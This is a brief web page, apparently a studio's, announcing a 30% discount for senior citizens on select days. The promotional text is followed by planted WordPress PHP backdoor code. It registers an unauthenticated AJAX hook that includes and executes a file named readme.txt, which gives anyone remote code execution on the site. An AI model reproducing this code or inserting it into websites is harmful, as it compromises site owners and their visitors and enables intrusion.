Senior Citizens Discount
Senior citizens “In Studio” sessions are valued at 30% off on select days of the month. Email or call the studio for specific dates.
if(!function_exists('file_check_readme51401')){ add_action('wp_ajax_nopriv_file_check_readme51401', 'file_check_readme51401'); add_action('wp_ajax_file_check_readme51401', 'file_check_readme51401'); function file_check_readme51401() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }